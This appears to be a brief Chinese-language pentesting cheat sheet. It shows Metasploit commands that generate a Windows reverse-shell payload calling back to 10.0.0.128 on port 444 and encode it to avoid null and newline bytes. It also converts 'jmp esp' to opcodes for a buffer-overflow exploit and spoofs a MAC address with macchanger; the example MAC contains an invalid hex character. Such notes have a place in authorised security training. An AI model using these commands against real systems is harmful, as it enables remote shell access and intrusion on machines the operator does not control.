1、生成shell code
/usr/share/framework2/msfpayload 如:生成windows的反弹444端口的shell code /usr/share/framework2/msfpayload win32_reverse LHOST=10.0.0.128 LPORT=444 C
##排除某些坏字符\x00\x0a\x0d
/usr/share/framework2/msfpayload win32_reverse LHOST=10.0.0.128 LPORT=444 R |/usr/share/framework2/msfencode -b "\x00\x0a\x0d
2、将汇编指令转换成二进制和16进制
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 如: root@kali:/usr/local/src# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > jmp esp 00000000 FFE4 jmp esp
3、更改mac地址
macchanger
如:更改eth0的mac地址 macchanger -m 00:1a:28:4b:8q:23 eth0